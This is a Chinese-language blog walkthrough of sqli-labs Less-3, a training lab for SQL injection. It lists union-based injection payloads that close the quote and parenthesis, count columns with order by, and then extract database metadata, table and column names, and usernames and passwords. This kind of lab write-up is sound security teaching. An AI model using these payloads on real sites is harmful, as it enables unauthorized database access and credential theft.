Less-3(基于错误的GET单引号变形字符型注入)

unkilledsky
• 阅读 667

(1)根据题意传入id=1,可看到有数据显示,当输入id=1’时则页面报错

Less-3(基于错误的GET单引号变形字符型注入) Less-3(基于错误的GET单引号变形字符型注入)

(2)根据报错信息可推测后台查询的id参数包含在()内,于是为了闭合括号,构造以下语句,发现正确执行

?id=1’) and 1=1 --+ //--+和%23(#)都表示注释的意思

Less-3(基于错误的GET单引号变形字符型注入)

(3)根据上题利用order by查字段数,然后利用union select爆数据库

?id=1') order by 3 --+

Less-3(基于错误的GET单引号变形字符型注入)

?id=1') order by 4 %23

Less-3(基于错误的GET单引号变形字符型注入)

?id=-1') union select 1,2,3 %23 //判断字符回显位置

Less-3(基于错误的GET单引号变形字符型注入)

?id=-1') union select 1,concat_ws('_',user(),version(),database()),3 %23

Less-3(基于错误的GET单引号变形字符型注入)

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' %23

Less-3(基于错误的GET单引号变形字符型注入)

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

Less-3(基于错误的GET单引号变形字符型注入)

?id=-1') union select 1,group_concat(username),group_concat(password) from security.users %23

Less-3(基于错误的GET单引号变形字符型注入)

评论区
推荐文章

暂无数据

unkilledsky
unkilledsky
Lv1
学生
目前是风御安全团队SRC组组长,老摸鱼选手了,各位多指教。
0
文章
0
粉丝
5
获赞
热门文章

暂无数据